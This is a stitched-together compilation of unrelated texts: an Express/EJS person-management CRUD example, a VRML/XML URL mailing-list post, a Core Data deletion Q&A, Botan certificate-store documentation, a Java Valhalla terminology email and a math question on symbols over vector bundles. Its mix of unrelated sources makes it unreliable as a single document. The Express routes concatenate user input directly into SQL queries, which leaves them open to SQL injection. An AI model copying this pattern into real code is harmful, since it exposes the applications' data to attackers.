connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ?',
}, ['David'], function (error, results, fields) {});
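The ? substitution shown above can be approximated as follows. This is a deliberately rough sketch of the idea — the mysql module's real escaping also handles dates, buffers, NULL, and the injection-relevant corner cases, so never use a hand-rolled version in production:

```javascript
// Rough sketch of value-placeholder substitution: each ? is replaced by the
// next value, with strings quoted and embedded single quotes doubled.
function formatSql(sql, values) {
  let i = 0;
  return sql.replace(/\?/g, () => {
    const v = values[i++];
    if (typeof v === 'number') return String(v);
    return "'" + String(v).replace(/'/g, "''") + "'";
  });
}

console.log(formatSql('SELECT * FROM `books` WHERE `author` = ?', ['David']));
// SELECT * FROM `books` WHERE `author` = 'David'
```

Passing values separately and letting the driver do this substitution is what keeps user input out of the SQL text itself.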
app.js (excerpt)
// route module (endpoint definitions), stored under the routes directory
var persons = require('./routes/person');
// EJS template engine
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
// mount the router: ('custom path', the router loaded above)
app.use("/persons",persons);
person.js
var express = require('express');
var router = express.Router();
var db = require("./db.js"); // load the database module
router.get('/', function (req, res, next) {
db.query('select * from person', function (err, rows) {
if (err) {
res.render('persons', {title: '人员管理', datas: []});
} else {
res.render('persons', {title: '人员管理', datas: rows});
}
})
});
// delete
router.get('/del/:id', function (req, res) {
var id = req.params.id;
db.query("delete from person where id=" + id, function (err, rows) {
if (err) {
res.end('删除失败:' + err)
} else {
res.redirect('/persons')
}
});
});
// add
router.get('/add', function (req, res) {
res.render('add');
});
router.post('/add', function (req, res) {
var name = req.body.name;
var age = req.body.age;
var professional = req.body.professional;
db.query("insert into person(name,age,professional) values('" + name + "'," + age + ",'" + professional + "')", function (err, rows) {
if (err) {
res.end('新增失败:' + err);
} else {
res.redirect('/persons');
}
})
});
// update
router.get('/toUpdate/:id', function (req, res) {
var id = req.params.id;
db.query("select * from person where id=" + id, function (err, rows) {
if (err) {
res.end('修改页面跳转失败:' + err);
} else {
res.render("update", {datas: rows}); // render the update page directly
}
});
});
router.post('/update', function (req, res) {
var id = req.body.id;
var name = req.body.name;
var age = req.body.age;
var professional = req.body.professional;
db.query("update person set name='" + name + "',age='" + age + "',professional= '" + professional + "' where id=" + id, function (err, rows) {
if (err) {
res.end('修改失败:' + err);
} else {
res.redirect('/persons');
}
});});
// search
router.post('/search', function (req, res) {
var name = req.body.s_name;
var age = req.body.s_age;
var professional = req.body.s_professional;
var sql = "select * from person";
if (name) {
sql += " and name like '%" + name + "%' ";
}
if (age) {
sql += " and age=" + age + " ";
}
if (professional) {
sql += " and professional like '%" + professional + "%' ";
}
sql = sql.replace("person and","person where"); // rewrite the first " and" into " where"
db.query(sql, function (err, rows) {
if (err) {
res.end("查询失败:" + err)
} else {
res.render("persons", {title: '人员管理', datas: rows});
}
});});
module.exports = router;
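The /search handler above appends " and …" fragments and then rewrites the first "and" into "where". A cleaner way to assemble the conditional WHERE clause is to collect the fragments and join them — a sketch of the same logic (in production the filter values should also go through ? placeholders rather than string concatenation):

```javascript
// Builds "select * from person [where c1 and c2 ...]" from optional filters,
// mirroring the /search handler without the string-replacement trick.
function buildSearchSql(filters) {
  const conds = [];
  if (filters.name) conds.push("name like '%" + filters.name + "%'");
  if (filters.age) conds.push('age=' + filters.age);
  if (filters.professional) conds.push("professional like '%" + filters.professional + "%'");
  let sql = 'select * from person';
  if (conds.length > 0) sql += ' where ' + conds.join(' and ');
  return sql;
}

console.log(buildSearchSql({ name: '张' }));
// select * from person where name like '%张%'
```

With join(' and ') there is no stray leading "and" to patch up, and adding a fourth filter is one more push().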
persons.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title><%= title %></title>
<style>
div{width:800px;margin: 0 auto;}
table {border-collapse:collapse;border-spacing:0;width:800px;}
table tr td ,table tr th {border-top:solid 1px #ccc;border-left:solid 1px #ccc;line-height: 40px;text-align: center;}
table tr td:last-child, table tr th:last-child {border-right:solid 1px #ccc;}
table tr:last-child td{border-bottom:solid 1px #ccc;}
a{text-decoration: none;font-size: 14px;}
.text{width:150px;}
</style>
</head>
<body>
<div>
<div style="">
<div style="float: left;width:10%;">
<a href="/persons/add">新增</a>
</div>
<div style="float: right;width:90%;">
<form action="/persons/search" method="post">
姓名:<input type="text" name="s_name" value="" class="text">
年龄:<input type="text" name="s_age" value="" class="text">
职业:<input type="text" name="s_professional" value="" class="text">
<input type="submit" value="查询">
</form>
</div>
</div>
<table style="">
<tr>
<th width="10%">编号</th>
<th width="15%">操作</th>
<th width="15%">姓名</th>
<th width="10%">年龄</th>
<th width="50%">职业</th>
</tr>
<% if (datas.length) { %>
<% datas.forEach(function(person){ %>
<tr>
<td><%= person.id %></td>
<td><a href="/persons/del/<%= person.id %>">删除</a> <a href="/persons/toUpdate/<%= person.id %>">修改</a></td>
<td><%= person.name %></td>
<td><%= person.age %></td>
<td><%= person.professional %></td>
</tr>
<% }) %>
<% } %>
</table>
</div>
</body>
</html>
add.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>新增页面</title>
</head>
<body>
<div style="width: 800px;margin: auto;">
<form action="/persons/add" method="post">
姓名:<input type="text" name="name">
年龄:<input type="text" name="age">
职业:<input type="text" name="professional">
<input type="submit" value="提交">
</form>
</div>
</body>
</html>
update.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>修改页面</title>
</head>
<body>
<div style="width: 800px;margin: auto;">
<form action="/persons/update" method="post">
<input type="hidden" value="<%= datas[0].id %>" name="id">
姓名:<input type="text" name="name" value="<%= datas[0].name %>">
年龄:<input type="text" name="age" value="<%= datas[0].age %>">
职业:<input type="text" name="professional" value="<%= datas[0].professional %>">
<input type="submit" value="提交">
</form>
</div>
</body>
</html>
Non-HTML URL Examples
As the use of the URL in XML is being debated, it is
worth noting some relevant facts:
1. The use of the URL in XML is not bounded by the
use of the URL in HTML. It is bounded by the RFCs.
No one disputes this although the argument has
been presented several times that getting too
far beyond HTML's use may impair XML's marketability.
That argument may be one of the reasons some
mistakenly believe XML is a replacement for HTML.
In fact, as argued next, XML can only define
the way in which an XML designer expresses the
URL use in the design.
2. XML is a metalanguage. HTML is an application.
This is worth noting because as a metalanguage, an
XML designer might choose to break up or use
a URL in many ways not anticipated by other
application designers. While this makes life
hard for the XML software designer, it is nonetheless
a fact of life for metalanguage applications.
It may impair the interoperability of XML
applications in the same way current SGML
applications do not interoperate, that is, without
a transform, it is meaningless to inline a
TEI document into a MIL-PRF-87269 database.
3. If XML is indeed a metalanguage, its URL
and link definitions should be capable of
declaring the following VRML examples. Whether this
is *worth* declaring is an application issue.
The point is, in the HyTime or TEI choices,
the winner should be capable of declaring the
following examples.
Here are examples from VRML. First, VRML
defines a URL as a field type. Specifically:
url [ ] is an exposedField of type MFString
An exposedField has an implied eventIn and
eventOut (think of it as an input and output jack)
to connect ROUTEs. There are several exposedFields
in VRML and more can be added by PROTOtypes.
An MF string is a space or comma delimited set
of characters, typically, options.
While the URL itself is defined by the RFC
as has been described in other posts, the
VRML application only cares that it is a string.
This allows the semantics to be applied per
node type. Thus:
Inline { url ["myworld.wrl"] }
where an inline file resembles an SGML
subdoc in that it is an encapsulated namespace.
A defined name is not recognized if instanced
by a USE within the inlining file. A defined
name within the inlining file is not recognized by
an inlined file. The URL within the Inline
can contain multiple URL strings that define a
prioritized list of places to find the URL target.
This list is used to provide a high-to-low
redundant backup (e.g., local disk, local net, WAN, Web)
for each reference.
If a URL is resolved, it returns nodes which are
children of the group parent of the Inline node.
If empty, no action is taken (default). Implementations
can use other rules such as using one URL to read high
priority/high bandwidth, while using a lower priority on a
slower line.
The URL list can be changed using the set_url eventIn
implied by the definition of the URL as an exposedField.
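As a hypothetical illustration (the node names and file names here are invented, not from the original post), the exposedField machinery described above is what lets a ROUTE retarget an Inline at run time:

```vrml
DEF Loader Inline { url [ "local/world.wrl" "http://example.com/world.wrl" ] }
DEF Chooser Script {
  url "javascript: function pick(v, t) { next = new MFString('other.wrl'); }"
  eventIn  SFBool   pick
  eventOut MFString next
}
ROUTE Chooser.next TO Loader.set_url
```

When Chooser fires its eventOut, the ROUTE delivers the new MFString to Loader's implied set_url eventIn, replacing the prioritized URL list.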
Anchor { url [ ] parameter [ ]
where the URL field is also an exposedField of type MFString
and a prioritized list. It is the parameter field (also, an
exposedField MFString) which contains additional strings
used by the browser when a target page is read. These
fields depend on the browser for functionality. The default
is empty. The #syntax we are used to CAN be appended
to the URL string, but it is restricted to name a Viewpoint
in the target file. As in HTML, using ONLY #viewpoint
is a camera view in the local file. Set_parameter eventIns
are available because it is an exposedField.
Last but most revealing is the following
Script { url "myscript.js"
or
Script { url "javascript:
function set_position(pos, time) {
position = pos;
}
"
field...
eventIn
eventOut
}
where a Script node can use the actual text of the
script as long as the script notation is defined
as shown, e.g., javascript: for that language, etc.
VRML does not REQUIRE support for any language.
It only requires that the script be indicated as shown.
These URL examples are provided in contrast to the
use of HTML anchors as examples of common
practice and to note that alternatives are used
in common Internet languages, are learnable,
and are being used everyday.
Len Bullard
Lockheed Martin
C2 Integration Systems
I've got a UITableView which is populated from an NSMutableArray. The NSMutableArray was created from my NSFetchedResultsController, which came from another view:
Templates *template2 = (Templates *)[fetchedResultsController objectAtIndexPath:indexPath];
qModalView.templateObject = template2;
and was recorded to templateObject, so I have got all my objects into my NSMutableArray that way:
[templateObject.questions allObjects];
Now I want to delete the row in my table view, in the array, and in that particular object in templateObject.questions.
Please help; I have this so far:
- (void)tableView:(UITableView *)tableView commitEditingStyle:(UITableViewCellEditingStyle)editingStyle forRowAtIndexPath:(NSIndexPath *)indexPath
{
Questions *question_var = [questionsArray objectAtIndex:indexPath.row];
NSLog(@"_____________________________%@", question_var.question_title);
NSManagedObjectContext *context = [templateObject managedObjectContext];
[context deleteObject:[templateObject.questions objectAtIndexPath:indexPath]];
NSError *error;
if (![context save:&error]) {
NSLog(@"Unresolved error %@, %@", error, [error userInfo]);
abort();
}else{
NSLog(@"deleted");
}
}
1 Answer (accepted)
You can remove the row from the table with
[tableView deleteRowsAtIndexPaths:[NSArray arrayWithObject:indexPath]
withRowAnimation:YES];
and you can delete an object from an NSMutableArray with
[myArray removeObject:myObject];
and how do I delete it from the database? Is it happening automatically? – Rouslan Karimov Dec 27 '10 at 17:46
You've already got the database delete, in the lines "[context deleteObject:[templateObject.questions objectAtIndexPath:indexPath]]; " and "[context save:&error]". – Seamus Campbell Dec 27 '10 at 17:51
Botan 2.17.3
Crypto and TLS for C++11
Public Member Functions | List of all members
Botan::Certificate_Store_In_SQLite Class Reference (final)
#include <certstor_sqlite.h>
Inheritance diagram for Botan::Certificate_Store_In_SQLite: derives from Botan::Certificate_Store_In_SQL, which derives from Botan::Certificate_Store.
Public Member Functions
void affirm_cert (const X509_Certificate &)
Reverses the revocation for "cert". More...
std::vector< X509_DNall_subjects () const override
bool certificate_known (const X509_Certificate &cert) const
Certificate_Store_In_SQLite (const std::string &db_path, const std::string &passwd, RandomNumberGenerator &rng, const std::string &table_prefix="")
std::vector< std::shared_ptr< const X509_Certificate > > find_all_certs (const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const override
std::shared_ptr< const X509_Certificatefind_cert (const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const override
std::shared_ptr< const X509_Certificatefind_cert_by_pubkey_sha1 (const std::vector< uint8_t > &key_hash) const override
std::shared_ptr< const X509_Certificatefind_cert_by_raw_subject_dn_sha256 (const std::vector< uint8_t > &subject_hash) const override
std::vector< std::shared_ptr< const X509_Certificate > > find_certs_for_key (const Private_Key &key) const
Returns all certificates for private key "key". More...
std::shared_ptr< const X509_CRLfind_crl_for (const X509_Certificate &issuer) const override
std::shared_ptr< const Private_Keyfind_key (const X509_Certificate &) const
Returns the private key for "cert" or an empty shared_ptr if none was found. More...
std::vector< X509_CRLgenerate_crls () const
bool insert_cert (const X509_Certificate &cert)
bool insert_key (const X509_Certificate &cert, const Private_Key &key)
bool remove_cert (const X509_Certificate &cert)
void remove_key (const Private_Key &key)
Removes "key" from the store. More...
void revoke_cert (const X509_Certificate &, CRL_Code, const X509_Time &time=X509_Time())
Marks "cert" as revoked starting from "time". More...
Detailed Description
Certificate and private key store backed by an sqlite (https://sqlite.org) database.
Definition at line 18 of file certstor_sqlite.h.
Constructor & Destructor Documentation
◆ Certificate_Store_In_SQLite()
Botan::Certificate_Store_In_SQLite::Certificate_Store_In_SQLite ( const std::string & db_path,
const std::string & passwd,
RandomNumberGenerator rng,
const std::string & table_prefix = ""
)
Create/open a certificate store.
Parameters
db_path — path to the database file
passwd — password to encrypt private keys in the database
rng — used for encrypting keys
table_prefix — optional prefix for db table names
Definition at line 13 of file certstor_sqlite.cpp.
16 :
17 Certificate_Store_In_SQL(std::make_shared<Sqlite3_Database>(db_path), passwd, rng, table_prefix)
18 {}
Member Function Documentation
◆ affirm_cert()
void Botan::Certificate_Store_In_SQL::affirm_cert ( const X509_Certificate cert)
inherited
Reverses the revocation for "cert".
Definition at line 289 of file certstor_sql.cpp.
References Botan::X509_Certificate::fingerprint().
290 {
291 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "revoked WHERE fingerprint == ?1");
292
293 stmt->bind(1,cert.fingerprint("SHA-256"));
294 stmt->spin();
295 }
◆ all_subjects()
std::vector< X509_DN > Botan::Certificate_Store_In_SQL::all_subjects ( ) const
overridevirtualinherited
Returns all subject DNs known to the store instance.
Implements Botan::Certificate_Store.
Definition at line 135 of file certstor_sql.cpp.
References Botan::X509_DN::decode_from().
136 {
137 std::vector<X509_DN> ret;
138 auto stmt = m_database->new_statement("SELECT subject_dn FROM " + m_prefix + "certificates");
139
140 while(stmt->step())
141 {
142 auto blob = stmt->get_blob(0);
143 BER_Decoder dec(blob.first,blob.second);
144 X509_DN dn;
145
146 dn.decode_from(dec);
147
148 ret.push_back(dn);
149 }
150
151 return ret;
152 }
◆ certificate_known()
bool Botan::Certificate_Store::certificate_known ( const X509_Certificate cert) const
inlineinherited
Returns
whether the certificate is known
Parameters
cert — certificate to be searched
Definition at line 72 of file certstor.h.
References Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
73 {
74 return find_cert(cert.subject_dn(), cert.subject_key_id()) != nullptr;
75 }
◆ find_all_certs()
std::vector< std::shared_ptr< const X509_Certificate > > Botan::Certificate_Store_In_SQL::find_all_certs ( const X509_DN subject_dn,
const std::vector< uint8_t > & key_id
) const
overridevirtualinherited
Find all certificates with a given Subject DN. Subject DN and even the key identifier might not be unique.
Implements Botan::Certificate_Store.
Definition at line 77 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode().
78 {
79 std::vector<std::shared_ptr<const X509_Certificate>> certs;
80
81 std::shared_ptr<SQL_Database::Statement> stmt;
82
83 const std::vector<uint8_t> dn_encoding = subject_dn.BER_encode();
84
85 if(key_id.empty())
86 {
87 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE subject_dn == ?1");
88 stmt->bind(1, dn_encoding);
89 }
90 else
91 {
92 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE\
93 subject_dn == ?1 AND (key_id == NULL OR key_id == ?2)");
94 stmt->bind(1, dn_encoding);
95 stmt->bind(2, key_id);
96 }
97
98 std::shared_ptr<const X509_Certificate> cert;
99 while(stmt->step())
100 {
101 auto blob = stmt->get_blob(0);
102 certs.push_back(std::make_shared<X509_Certificate>(
103 std::vector<uint8_t>(blob.first,blob.first + blob.second)));
104 }
105
106 return certs;
107 }
◆ find_cert()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert ( const X509_DN subject_dn,
const std::vector< uint8_t > & key_id
) const
overridevirtualinherited
Returns the first certificate with matching subject DN and optional key ID.
Reimplemented from Botan::Certificate_Store.
Definition at line 48 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode().
Referenced by Botan::Certificate_Store_In_SQL::remove_cert().
49 {
50 std::shared_ptr<SQL_Database::Statement> stmt;
51
52 const std::vector<uint8_t> dn_encoding = subject_dn.BER_encode();
53
54 if(key_id.empty())
55 {
56 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE subject_dn == ?1 LIMIT 1");
57 stmt->bind(1, dn_encoding);
58 }
59 else
60 {
61 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE\
62 subject_dn == ?1 AND (key_id == NULL OR key_id == ?2) LIMIT 1");
63 stmt->bind(1, dn_encoding);
64 stmt->bind(2,key_id);
65 }
66
67 while(stmt->step())
68 {
69 auto blob = stmt->get_blob(0);
70 return std::make_shared<X509_Certificate>(std::vector<uint8_t>(blob.first, blob.first + blob.second));
71 }
72
73 return std::shared_ptr<const X509_Certificate>();
74 }
◆ find_cert_by_pubkey_sha1()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert_by_pubkey_sha1 ( const std::vector< uint8_t > & key_hash) const
overridevirtualinherited
Find a certificate by searching for one with a matching SHA-1 hash of public key. Used for OCSP.
Parameters
key_hashSHA-1 hash of the subject's public key
Returns
a matching certificate or nullptr otherwise
Implements Botan::Certificate_Store.
Definition at line 110 of file certstor_sql.cpp.
111 {
112 throw Not_Implemented("Certificate_Store_In_SQL::find_cert_by_pubkey_sha1");
113 }
◆ find_cert_by_raw_subject_dn_sha256()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert_by_raw_subject_dn_sha256 ( const std::vector< uint8_t > & subject_hash) const
overridevirtualinherited
Find a certificate by searching for one with a matching SHA-256 hash of raw subject name. Used for OCSP.
Parameters
subject_hashSHA-256 hash of the subject's raw name
Returns
a matching certificate or nullptr otherwise
Implements Botan::Certificate_Store.
Definition at line 116 of file certstor_sql.cpp.
117 {
118 throw Not_Implemented("Certificate_Store_In_SQL::find_cert_by_raw_subject_dn_sha256");
119 }
◆ find_certs_for_key()
std::vector< std::shared_ptr< const X509_Certificate > > Botan::Certificate_Store_In_SQL::find_certs_for_key ( const Private_Key key) const
inherited
Returns all certificates for private key "key".
Definition at line 213 of file certstor_sql.cpp.
References Botan::Private_Key::fingerprint_private().
214 {
215 auto fpr = key.fingerprint_private("SHA-256");
216 auto stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE priv_fingerprint == ?1");
217
218 stmt->bind(1,fpr);
219
220 std::vector<std::shared_ptr<const X509_Certificate>> certs;
221 while(stmt->step())
222 {
223 auto blob = stmt->get_blob(0);
224 certs.push_back(std::make_shared<X509_Certificate>(
225 std::vector<uint8_t>(blob.first,blob.first + blob.second)));
226 }
227
228 return certs;
229 }
◆ find_crl_for()
std::shared_ptr< const X509_CRL > Botan::Certificate_Store_In_SQL::find_crl_for ( const X509_Certificate issuer) const
overridevirtualinherited
Generates a CRL for all certificates issued by the given issuer.
Reimplemented from Botan::Certificate_Store.
Definition at line 122 of file certstor_sql.cpp.
References Botan::Certificate_Store_In_SQL::generate_crls(), and Botan::X509_Certificate::issuer_dn().
123 {
124 auto all_crls = generate_crls();
125
126 for(auto crl: all_crls)
127 {
128 if(!crl.get_revoked().empty() && crl.issuer_dn() == subject.issuer_dn())
129 return std::shared_ptr<X509_CRL>(new X509_CRL(crl));
130 }
131
132 return std::shared_ptr<X509_CRL>();
133 }
◆ find_key()
std::shared_ptr< const Private_Key > Botan::Certificate_Store_In_SQL::find_key ( const X509_Certificate cert) const
inherited
Returns the private key for "cert" or an empty shared_ptr if none was found.
Definition at line 193 of file certstor_sql.cpp.
References Botan::X509_Certificate::fingerprint(), and Botan::PKCS8::load_key().
Referenced by Botan::Certificate_Store_In_SQL::insert_key().
194 {
195 auto stmt = m_database->new_statement("SELECT key FROM " + m_prefix + "keys "
196 "JOIN " + m_prefix + "certificates ON " +
197 m_prefix + "keys.fingerprint == " + m_prefix + "certificates.priv_fingerprint "
198 "WHERE " + m_prefix + "certificates.fingerprint == ?1");
199 stmt->bind(1,cert.fingerprint("SHA-256"));
200
201 std::shared_ptr<const Private_Key> key;
202 while(stmt->step())
203 {
204 auto blob = stmt->get_blob(0);
205 DataSource_Memory src(blob.first,blob.second);
206 key.reset(PKCS8::load_key(src, m_rng, m_password));
207 }
208
209 return key;
210 }
◆ generate_crls()
std::vector< X509_CRL > Botan::Certificate_Store_In_SQL::generate_crls ( ) const
inherited
Generates Certificate Revocation Lists for all certificates marked as revoked. A CRL is returned for each unique issuer DN.
Definition at line 297 of file certstor_sql.cpp.
Referenced by Botan::Certificate_Store_In_SQL::find_crl_for().
298 {
299 auto stmt = m_database->new_statement(
300 "SELECT certificate,reason,time FROM " + m_prefix + "revoked "
301 "JOIN " + m_prefix + "certificates ON " +
302 m_prefix + "certificates.fingerprint == " + m_prefix + "revoked.fingerprint");
303
304 std::map<X509_DN,std::vector<CRL_Entry>> crls;
305 while(stmt->step())
306 {
307 auto blob = stmt->get_blob(0);
308 auto cert = X509_Certificate(
309 std::vector<uint8_t>(blob.first,blob.first + blob.second));
310 auto code = static_cast<CRL_Code>(stmt->get_size_t(1));
311 auto ent = CRL_Entry(cert,code);
312
313 auto i = crls.find(cert.issuer_dn());
314 if(i == crls.end())
315 {
316 crls.insert(std::make_pair(cert.issuer_dn(),std::vector<CRL_Entry>({ent})));
317 }
318 else
319 {
320 i->second.push_back(ent);
321 }
322 }
323
324 std::vector<X509_CRL> ret;
325 X509_Time t(std::chrono::system_clock::now());
326
327 for(auto p: crls)
328 {
329 ret.push_back(X509_CRL(p.first,t,t,p.second));
330 }
331
332 return ret;
333 }
◆ insert_cert()
bool Botan::Certificate_Store_In_SQL::insert_cert ( const X509_Certificate cert)
inherited
Inserts "cert" into the store, returns false if the certificate is already known and true if insertion was successful.
Definition at line 154 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode(), Botan::X509_Certificate::fingerprint(), Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
Referenced by Botan::Certificate_Store_In_SQL::insert_key(), and Botan::Certificate_Store_In_SQL::revoke_cert().
155 {
156 const std::vector<uint8_t> dn_encoding = cert.subject_dn().BER_encode();
157 const std::vector<uint8_t> cert_encoding = cert.BER_encode();
158
159 auto stmt = m_database->new_statement("INSERT OR REPLACE INTO " +
160 m_prefix + "certificates (\
161 fingerprint, \
162 subject_dn, \
163 key_id, \
164 priv_fingerprint, \
165 certificate \
166 ) VALUES ( ?1, ?2, ?3, ?4, ?5 )");
167
168 stmt->bind(1,cert.fingerprint("SHA-256"));
169 stmt->bind(2,dn_encoding);
170 stmt->bind(3,cert.subject_key_id());
171 stmt->bind(4,std::vector<uint8_t>());
172 stmt->bind(5,cert_encoding);
173 stmt->spin();
174
175 return true;
176 }
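The upsert pattern used here ("INSERT OR REPLACE" keyed on the certificate fingerprint) is plain SQLite and can be tried directly with Python's stdlib sqlite3 module. The table below is a simplified stand-in for the store's schema, not Botan code:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE certificates ("
    " fingerprint TEXT PRIMARY KEY,"
    " subject_dn BLOB,"
    " key_id BLOB,"
    " priv_fingerprint TEXT,"
    " certificate BLOB)"
)

def insert_cert(fingerprint, subject_dn, key_id, certificate):
    # Mirrors the statement in insert_cert(): re-inserting the same
    # fingerprint replaces the row instead of raising a constraint error.
    conn.execute(
        "INSERT OR REPLACE INTO certificates"
        " (fingerprint, subject_dn, key_id, priv_fingerprint, certificate)"
        " VALUES (?, ?, ?, ?, ?)",
        (fingerprint, subject_dn, key_id, "", certificate),
    )

insert_cert("aa:bb", b"dn1", b"kid1", b"cert-v1")
insert_cert("aa:bb", b"dn1", b"kid1", b"cert-v2")  # replaces, does not duplicate
count, = conn.execute("SELECT COUNT(*) FROM certificates").fetchone()
print(count)  # 1
```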
◆ insert_key()
bool Botan::Certificate_Store_In_SQL::insert_key ( const X509_Certificate & cert,
const Private_Key & key
)
inherited
Inserts "key" for "cert" into the store, returns false if the key is already known and true if insertion was successful.
Definition at line 231 of file certstor_sql.cpp.
References Botan::PKCS8::BER_encode(), Botan::Certificate_Store_In_SQL::find_key(), Botan::X509_Certificate::fingerprint(), Botan::Private_Key::fingerprint_private(), and Botan::Certificate_Store_In_SQL::insert_cert().
231 {
232 insert_cert(cert);
233
234 if(find_key(cert))
235 return false;
236
237 auto pkcs8 = PKCS8::BER_encode(key, m_rng, m_password);
238 auto fpr = key.fingerprint_private("SHA-256");
239
240 auto stmt1 = m_database->new_statement(
241 "INSERT OR REPLACE INTO " + m_prefix + "keys ( fingerprint, key ) VALUES ( ?1, ?2 )");
242
243 stmt1->bind(1,fpr);
244 stmt1->bind(2,pkcs8.data(),pkcs8.size());
245 stmt1->spin();
246
247 auto stmt2 = m_database->new_statement(
248 "UPDATE " + m_prefix + "certificates SET priv_fingerprint = ?1 WHERE fingerprint == ?2");
249
250 stmt2->bind(1,fpr);
251 stmt2->bind(2,cert.fingerprint("SHA-256"));
252 stmt2->spin();
253
254 return true;
255 }
◆ remove_cert()
bool Botan::Certificate_Store_In_SQL::remove_cert ( const X509_Certificate & cert )
inherited
Removes "cert" from the store. Returns false if the certificate could not be found and true if removal was successful.
Definition at line 179 of file certstor_sql.cpp.
References Botan::Certificate_Store_In_SQL::find_cert(), Botan::X509_Certificate::fingerprint(), Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
180 {
181 if(!find_cert(cert.subject_dn(),cert.subject_key_id()))
182 return false;
183
184 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "certificates WHERE fingerprint == ?1");
185
186 stmt->bind(1,cert.fingerprint("SHA-256"));
187 stmt->spin();
188
189 return true;
190 }
◆ remove_key()
void Botan::Certificate_Store_In_SQL::remove_key ( const Private_Key & key )
inherited
Removes "key" from the store.
Definition at line 257 of file certstor_sql.cpp.
References Botan::Private_Key::fingerprint_private().
258 {
259 auto fpr = key.fingerprint_private("SHA-256");
260 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "keys WHERE fingerprint == ?1");
261
262 stmt->bind(1,fpr);
263 stmt->spin();
264 }
◆ revoke_cert()
void Botan::Certificate_Store_In_SQL::revoke_cert ( const X509_Certificate & cert,
CRL_Code code,
const X509_Time & time = X509_Time()
)
inherited
Marks "cert" as revoked starting from "time".
Definition at line 267 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode(), Botan::X509_Certificate::fingerprint(), Botan::Certificate_Store_In_SQL::insert_cert(), and Botan::ASN1_Time::time_is_set().
268 {
269 insert_cert(cert);
270
271 auto stmt1 = m_database->new_statement(
272 "INSERT OR REPLACE INTO " + m_prefix + "revoked ( fingerprint, reason, time ) VALUES ( ?1, ?2, ?3 )");
273
274 stmt1->bind(1,cert.fingerprint("SHA-256"));
275 stmt1->bind(2,code);
276
277 if(time.time_is_set())
278 {
279 stmt1->bind(3, time.BER_encode());
280 }
281 else
282 {
283 stmt1->bind(3, static_cast<size_t>(-1));
284 }
285
286 stmt1->spin();
287 }
Valhalla basic concepts / terminology
Dan Smith daniel.smith at oracle.com
Tue Jun 9 21:18:21 UTC 2020
I think there remain some finer details of the usage of these terms to be nailed down. Here's an overview of how I think about it. (Please note that I'm talking about the language model here. Exactly how this translates into the JVM model is a separate problem.)
- The *values* of the Java Programming Language are *reference values*—references to objects—and *inline values*—the objects themselves. An *object* is either a *class instance* or an *array*. (See JLS 4.3.1.) All objects can be manipulated via a reference value. Only some objects can also be manipulated directly as inline values.
- A *class* describes the structure of a class instance. A *concrete class* can be *instantiated* (typically via a class instance creation expression). An *inline class* is a concrete class whose instances can be treated as inline values. An *identity class* is a concrete class whose instances support identity-sensitive behaviors, and so must always be handled via references.
- A *type* describes a set of values. An *inline type* consists of inline values, the instances of a particular inline class. A *reference type* consists of references to objects with a particular property, or the null reference. Inline types are disjoint. Reference types have subsetting relationships, captured by the *subtype* relation.
- A *type expression* is the syntax used to refer to a particular type. A class name is one example of a type expression, with a variety of rules used to map this name to a specific type. The type expression 'ClassName' often denotes a reference type, but for some inline classes denotes its inline type. The type expression 'ClassName.ref' denotes the reference type of an inline class, and the type expression 'ClassName.val' denotes the inline type of an inline class. (Whether these decorations are allowed redundantly is TBD.)
Where did the primitives go? Primitive values are inline values—specifically, instances of certain inline classes (hopefully the class java.lang.Integer, etc., if we can make the migration work). Primitive types are inline types (e.g., 'int' is shorthand for 'java.lang.Integer.val').
---
A few things that still make me a bit uneasy, maybe could use more noodling:
- "Inline value" vs. "reference value" makes sense. Then re-using "inline" for "inline class" vs. "identity class" is potentially confusing. In this context, we're using "inline" as shorthand for "inline-capable" and "identity-free". It would sort of be nice if we could flip the world and make 'identity' the class declaration keyword (although we'd still need a term for the absence of that keyword).
- The syntax ".val" used to denote an "inline type" is a bit of a mismatch. Maybe we want a new syntax. Or maybe we want to rework the word "value" into the story so that "inline type" becomes "value type".
- The term "class type" now has multiple possible interpretations. I guess, unless it's qualified further, it ought to refer to all types "derived from" a particular class, including reference types, inline types, parameterized types, raw types, ... The taxonomy of types, including appropriate terms, needs to be sorted out.
- I'm ignoring generic inline classes. We're all ignoring generic inline classes. :-) Generics in the inline type world are, I think, a somewhat different beast than generics in the reference type world, because inline types are disjoint. More work to be done here.
More information about the valhalla-spec-observers mailing list
Normally, in the context of pseudo-differential operators, a symbol on a vector bundle $E$ is defined as a smooth function on $E$ which in each trivializing chart fulfills the usual symbol estimates \begin{equation} \sup_{x \in U, \xi \in \mathbb{R}^p} (1 + |\xi|^2)^{\frac{-m + |\beta|}{2}} \ |D^\alpha_x D^\beta_\xi a(x, \xi)| < \infty. \end{equation}
Does there exist a definition which does not directly rely on a local trivialization?
